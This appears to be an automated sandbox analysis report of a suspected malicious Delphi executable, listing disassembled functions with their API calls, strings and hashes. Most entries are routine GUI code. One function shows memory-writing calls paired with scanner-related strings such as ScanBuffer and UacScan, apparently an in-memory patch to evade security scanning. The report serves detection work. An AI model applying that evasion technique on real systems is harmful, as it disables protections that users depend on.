API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
String ID:
API String ID: 3867285559-0
Opcode ID: 9a3220e39971d19614e7bb4e7e390bd62e23ec9d7e65e37c842b8faa60e2dab3
Instruction ID: 51a89071a64f963f40a3a68912739c4b5552423f5f89009c6ede6631a27c2153
Opcode Fuzzy Hash: 9a3220e39971d19614e7bb4e7e390bd62e23ec9d7e65e37c842b8faa60e2dab3
Instruction Fuzzy Hash: 8C414935B00204AFEB10EBA9CD84BAEB7F8AB48704F5044A9B919DB291DB75ED05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04216E84 Relevance: 16.6, APIs: 11, Instructions: 91COMMON

Download Yara Rule

APIs

IsWindowUnicode.USER32(?), ref: 04216E9E
SetWindowLongW.USER32(?,000000FC,?), ref: 04216EB9
GetWindowLongW.USER32(?,000000F0), ref: 04216EC4
GetWindowLongW.USER32(?,000000F4), ref: 04216ED6
SetWindowLongW.USER32(?,000000F4,?), ref: 04216EE9
SetWindowLongA.USER32(?,000000FC,?), ref: 04216F02
GetWindowLongA.USER32(?,000000F0), ref: 04216F0D
GetWindowLongA.USER32(?,000000F4), ref: 04216F1F
SetWindowLongA.USER32(?,000000F4,?), ref: 04216F32
SetPropA.USER32(?,00000000,00000000), ref: 04216F49
SetPropA.USER32(?,00000000,00000000), ref: 04216F60

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Window$Long$Prop$Unicode
String ID:
API String ID: 1693715928-0
Opcode ID: 75e74c24301cab2c37f9ce728e31e530f2c24b6ebddadfa3fc5c1e0d98c10a16
Instruction ID: 7a5fc0707744bb435f0484774a56018849e8aa418b5ecd104cd020b9b3b35b66
Opcode Fuzzy Hash: 75e74c24301cab2c37f9ce728e31e530f2c24b6ebddadfa3fc5c1e0d98c10a16
Instruction Fuzzy Hash: 6C319B79604249BBEF14DFADD884EBA3BECEB09264F144650BA24CB2D1D739F940DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0423AE00 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 420libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,UacScan,0427A350,0423B464,OpenSession,0427A350,0423B464,ScanBuffer,0427A350,0423B464,00000000,0423B44C), ref: 0423AF47
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0423AF4D

Part of subcall function 041FFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD70
Part of subcall function 041FFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD7E
Part of subcall function 041FFD38: GetProcAddress.KERNEL32(74B80000,00000000), ref: 041FFD97
Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB3
Part of subcall function 041FFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB9
Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE3
Part of subcall function 041FFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE9
Part of subcall function 041FFD38: FreeLibrary.KERNEL32(74B80000,00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000), ref: 041FFDF4

Strings

C:\Windows\System32\ntdll.dll, xrefs: 0423AF42
UacInitialize, xrefs: 0423AF61, 0423B0CB, 0423B1E2
NtWriteVirtualMemory, xrefs: 0423AF3D
ScanString, xrefs: 0423B072
OpenSession, xrefs: 0423AE92, 0423AFBA, 0423B2C4, 0423B351
ScanBuffer, xrefs: 0423AE39, 0423B013, 0423B136, 0423B253, 0423B3C2
UacScan, xrefs: 0423AEEB

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleLibraryMemoryModuleProcProcessVirtual$FreeLoadProtectWrite
String ID: C:\Windows\System32\ntdll.dll$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
API String ID: 327143009-4174081549
Opcode ID: 442fdd677a80759c836c3176855b378f5cac81dee7b2f4975acb8dfb27fe738f
Instruction ID: 20c4bf6e486f6bc73bd15d4b95c721519b2f3990adb0c2c292c5495256bfbab4
Opcode Fuzzy Hash: 442fdd677a80759c836c3176855b378f5cac81dee7b2f4975acb8dfb27fe738f
Instruction Fuzzy Hash: 8BF12139B10519DBEB04EBA5DCD0BEEB7B9EF88205F1181A1D204EB215DB30BD468F55

Uniqueness

Uniqueness Score: -1.00%

Function 0421FA8C Relevance: 15.2, APIs: 10, Instructions: 227windowCOMMON

Download Yara Rule

APIs

RectVisible.GDI32(00000000,?), ref: 0421FBA4
SaveDC.GDI32(00000000), ref: 0421FBC7
IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 0421FC07
RestoreDC.GDI32(00000000,00000000), ref: 0421FC33

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Rect$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 1976014923-0
Opcode ID: eac43377e8b3259acab4f830902c768de5c801b3ce01cdc8fad91acd1af14625
Instruction ID: a0b7ab318c0ac207a90d2f6fd3be615ff084eb6d06ad45aac1eb61bd9e17d87f
Opcode Fuzzy Hash: eac43377e8b3259acab4f830902c768de5c801b3ce01cdc8fad91acd1af14625
Instruction Fuzzy Hash: C5912774B102499FDB04DFA9C984FAEBBF8BF18304F4540A5EA54EB2A2D735E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0422F0F8 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 0422F143
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 0422F161
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0422F16E
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0422F17B
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0422F188
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0422F195
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0422F1A2
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0422F1AF
EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 0422F1CD
EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 0422F1E9

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
Instruction ID: 9b67870745399de94e05c8be75dbcf896ba737848814143041e61e9e5cd3afe8
Opcode Fuzzy Hash: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
Instruction Fuzzy Hash: A7210974394715BAF720DB38CECDF697AD95B24B08F8640A0B6487F6D2C7A4BA409714

Uniqueness

Uniqueness Score: -1.00%

Function 041E25CA Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

The sizes of unexpected leaked medium and large blocks are: , xrefs: 041E28E5
, xrefs: 041E28B0
Unexpected Memory Leak, xrefs: 041E295C
An unexpected memory leak has occurred. , xrefs: 041E272C
The unexpected small block leaks are:, xrefs: 041E27A3
bytes: , xrefs: 041E27F9
7, xrefs: 041E273D

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: fe272ac562e106763710f9240a1288f026b85bd75e3afc9a5a0115542cdfde1a
Instruction ID: 4306f889782ae9672a0e71a4d93e16a36e31392a6505d093d8e2fc079f703367
Opcode Fuzzy Hash: fe272ac562e106763710f9240a1288f026b85bd75e3afc9a5a0115542cdfde1a
Instruction Fuzzy Hash: E871F538B046688BEF219B2ECCD4BE8B7F9EB09704F1040E5D149EB242DB75A9C5CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0421A170 Relevance: 13.7, APIs: 9, Instructions: 154COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,?), ref: 0421A1AB
MulDiv.KERNEL32(?,?,?), ref: 0421A1C5
MulDiv.KERNEL32(?,?,?), ref: 0421A1F3
MulDiv.KERNEL32(?,?,?), ref: 0421A209
MulDiv.KERNEL32(?,?,?), ref: 0421A241
MulDiv.KERNEL32(?,?,?), ref: 0421A259

Part of subcall function 042024FC: MulDiv.KERNEL32(00000000,00000048,?), ref: 0420250D

MulDiv.KERNEL32(?), ref: 0421A2B0
MulDiv.KERNEL32(?), ref: 0421A2DA
MulDiv.KERNEL32(00000000), ref: 0421A300

Part of subcall function 04202518: MulDiv.KERNEL32(00000000,?,00000048), ref: 04202525

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 083b4522f788f2605366d647306a04d40284cc769ce5b21b8360dc04612198d4
Instruction ID: 14683ab75d666c74ccd943ba10a63dcb5f4c82855876ad76f2580e7088b19472
Opcode Fuzzy Hash: 083b4522f788f2605366d647306a04d40284cc769ce5b21b8360dc04612198d4
Instruction Fuzzy Hash: C0514D70719751AFD320DA69C884B6AB7F9AF65304F44481DF9D5C7262DA7AF840CB20

Uniqueness

Uniqueness Score: -1.00%

Function 04232A94 Relevance: 13.6, APIs: 9, Instructions: 132windowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 041FE97C: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 041FE99A

GetClassInfoA.USER32(041E0000,04232730,?), ref: 04232AF3
RegisterClassA.USER32(0424B650), ref: 04232B0B

Part of subcall function 041E669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 041E66CE

SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 04232BA7
SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 04232BC9
SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 04232BDC
GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,042299E0), ref: 04232BE7
DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,042299E0), ref: 04232BF6
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,042299E0), ref: 04232C03
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,042299E0), ref: 04232C1A

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
String ID:
API String ID: 2103932818-0
Opcode ID: d81b37dc43fbac58694489ae099fcfdcee3ebf10b58c3c5b30045dc5a580616d
Instruction ID: 99cf3ce58b799fc116227480d07a1eb27823c170274677077fe16c0cc6ff88f0
Opcode Fuzzy Hash: d81b37dc43fbac58694489ae099fcfdcee3ebf10b58c3c5b30045dc5a580616d
Instruction Fuzzy Hash: CF413BB8B10641ABF710EF69EDC5F6937A9EB19704F4144A0FA00EB292D775BC408B24

Uniqueness

Uniqueness Score: -1.00%

Function 0421B0F4 Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0421B12B
GetDCEx.USER32(?,00000000,00000402), ref: 0421B13E
SelectObject.GDI32(?,00000000), ref: 0421B161
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0421B187
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0421B1A9
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0421B1C8
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0421B1E2
SelectObject.GDI32(?,?), ref: 0421B1EF
ReleaseDC.USER32(?,?), ref: 0421B209

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: ObjectSelect$DesktopReleaseWindow
String ID:
API String ID: 1187665388-0
Opcode ID: 1082657284b2601d93558fea930a3bc10584190b59f474b39da3ef2ed73ef03b
Instruction ID: 979fb7048f3a1a913f2a2d25e02dbb9f0e8099ef96cf5f6822365b61d70294db
Opcode Fuzzy Hash: 1082657284b2601d93558fea930a3bc10584190b59f474b39da3ef2ed73ef03b
Instruction Fuzzy Hash: 803107B6E00619AFEB01DEEDCC89DAFBBBCFF19604B804464B554E7244C675AD048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 041ECFCC Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,041ED297,?,?,00000000,00000000), ref: 041ED002

Part of subcall function 041EB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 041EB8E2

Strings

:mm, xrefs: 041ED235
AMPM , xrefs: 041ED225
m/d/yy, xrefs: 041ED0D1
mmmm d, yyyy, xrefs: 041ED0FE
AMPM, xrefs: 041ED216
:mm:ss, xrefs: 041ED252

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 5eed3869060e5c6c7b9b3a56d157afa1347c70ad0c0e9392bae11cdab910152f
Instruction ID: 7711b1c10234cb50c50d6dd432b65a01bfbddcdf37258b138d9149fdc3b1fad6
Opcode Fuzzy Hash: 5eed3869060e5c6c7b9b3a56d157afa1347c70ad0c0e9392bae11cdab910152f
Instruction Fuzzy Hash: 77616578B04A4A5BFB04EBE6E8C0ABE77A5DF88304F149435D100AB345CB39FD459B55

Uniqueness

Uniqueness Score: -1.00%

Function 0421E58C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(?,?,?), ref: 0421E650
UnregisterClassA.USER32(?,?), ref: 0421E678
RegisterClassA.USER32(?), ref: 0421E68E
GetWindowLongA.USER32(00000000,000000F0), ref: 0421E6CA
GetWindowLongA.USER32(00000000,000000F4), ref: 0421E6DF
SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 0421E6F2

Strings

@, xrefs: 0421E5C5

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: ClassLongWindow$InfoRegisterUnregister
String ID: @
API String ID: 717780171-2766056989
Opcode ID: 0ed31c20965d8965650dccd09bce1f56390bcb910171ee1da1063ad75bffcb31
Instruction ID: d952b4c66ca16ad9bb2b40db20d8d960c12583cd80a18e1d3d62532bbec7805b
Opcode Fuzzy Hash: 0ed31c20965d8965650dccd09bce1f56390bcb910171ee1da1063ad75bffcb31
Instruction Fuzzy Hash: 7751CF34B107549FEB20EB69CC84BAEB7F9AF15308F4045A9E819D72A1DB30B945CB11

Uniqueness

Uniqueness Score: -1.00%

Function 0420AFD0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 0420B001
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0420B028
GetSystemMetrics.USER32(00000000), ref: 0420B03D
GetSystemMetrics.USER32(00000001), ref: 0420B048
lstrcpyA.KERNEL32(?,DISPLAY), ref: 0420B072

Part of subcall function 0420ACA4: GetProcAddress.KERNEL32(76BE0000,00000000), ref: 0420AD23

Strings

GetMonitorInfo, xrefs: 0420AFE8
DISPLAY, xrefs: 0420B069

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfo
API String ID: 1539801207-1633989206
Opcode ID: 0669ed894894ba3d530144cac2e252387adb42fdc94dfd8b95d7ae60fd5c27d8
Instruction ID: 934c8cd05ea5e695bf084c2c677de7eb9869579c9a38a8536bf9290d7895f5bb
Opcode Fuzzy Hash: 0669ed894894ba3d530144cac2e252387adb42fdc94dfd8b95d7ae60fd5c27d8
Instruction Fuzzy Hash: 3A11DA31B50711AFE730CFA49C44767BBEAEB05360F008529ED6597681D7B4B844C791

Uniqueness

Uniqueness Score: -1.00%

Function 041E4608 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,041E46CF,?,?,042797C8,?,?,0424A7AC,041E68FD,04249751), ref: 041E4641
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,041E46CF,?,?,042797C8,?,?,0424A7AC,041E68FD,04249751), ref: 041E4647
GetStdHandle.KERNEL32(000000F5,041E4690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,041E46CF,?,?,042797C8), ref: 041E465C
WriteFile.KERNEL32(00000000,000000F5,041E4690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,041E46CF,?,?), ref: 041E4662
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 041E4680

Strings

Runtime error at 00000000, xrefs: 041E463A, 041E4679
Error, xrefs: 041E4674

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 53c1067fd490e96084079633d636e787aabc3adf145f3dc5e6715612ce78d5a8
Instruction ID: 14847de7b80997e4f2013933c7598777d94e5566f6b1979cb640da684d95802b
Opcode Fuzzy Hash: 53c1067fd490e96084079633d636e787aabc3adf145f3dc5e6715612ce78d5a8
Instruction Fuzzy Hash: 1BF09658B94780F5F72066556C89FFD2768D7C8F28F244654B320940C18BB878C4CF21

Uniqueness

Uniqueness Score: -1.00%

Function 04235ED0 Relevance: 12.2, APIs: 8, Instructions: 170windowCOMMON

Download Yara Rule

APIs

ImageList_DrawEx.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 04235F2F
ImageList_DrawEx.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 04235FD0
SetTextColor.GDI32(00000000,00FFFFFF), ref: 0423601D
SetBkColor.GDI32(00000000,00000000), ref: 04236025
BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 0423604A

Part of subcall function 04235EA8: ImageList_GetBkColor.COMCTL32(00000000,?,04235F09,00000000,?), ref: 04235EBE

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: ColorImageList_$Draw$Text
String ID:
API String ID: 2027629008-0
Opcode ID: bb41f6a5d9bcc7fe8a7bcdf46372e8994c48839118a9efa8b7174e22ca0a4c7a
Instruction ID: a97b65538c9d54f5ddc16f01e85b85db6dadcbec6abba5261045bdc46609c41e
Opcode Fuzzy Hash: bb41f6a5d9bcc7fe8a7bcdf46372e8994c48839118a9efa8b7174e22ca0a4c7a
Instruction Fuzzy Hash: E15104B1710205AFEB50EF68CD81FAE77E9AF08714F504161BA04EB2C6CA74FC818B65

Uniqueness

Uniqueness Score: -1.00%

Function 042306A4 Relevance: 12.2, APIs: 8, Instructions: 154windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 04230715
GetCapture.USER32 ref: 04230724
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0423072A
ReleaseCapture.USER32 ref: 0423072F
GetActiveWindow.USER32 ref: 04230780
SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 04230816
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 04230883
GetActiveWindow.USER32 ref: 04230892

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: 2f34bf1480649e28ec00e89b3edd20067b8bcce75f191fad7d41b890f21f0a80
Instruction ID: dcba37d4f9c87031b180bae4c63f5574ba1f28438125358727c98a9b3b4a1a67
Opcode Fuzzy Hash: 2f34bf1480649e28ec00e89b3edd20067b8bcce75f191fad7d41b890f21f0a80
Instruction Fuzzy Hash: 345146B4B10684AFEB01EFA9C985BAD7BF2EF45709F5540A0E400AB265D778BE40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0421FD5C Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

SaveDC.GDI32(?), ref: 0421FD79

Part of subcall function 04218B74: GetWindowOrgEx.GDI32(00000000), ref: 04218B82
Part of subcall function 04218B74: SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 04218B98

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0421FDB2
GetWindowLongA.USER32(00000000,000000EC), ref: 0421FDC6
GetWindowLongA.USER32(00000000,000000F0), ref: 0421FDE7
SetRect.USER32(?,00000000,00000000,?,?), ref: 0421FE17
DrawEdge.USER32(?,?,00000000,00000000), ref: 0421FE26
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0421FE4F
RestoreDC.GDI32(?,?), ref: 0421FECE

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

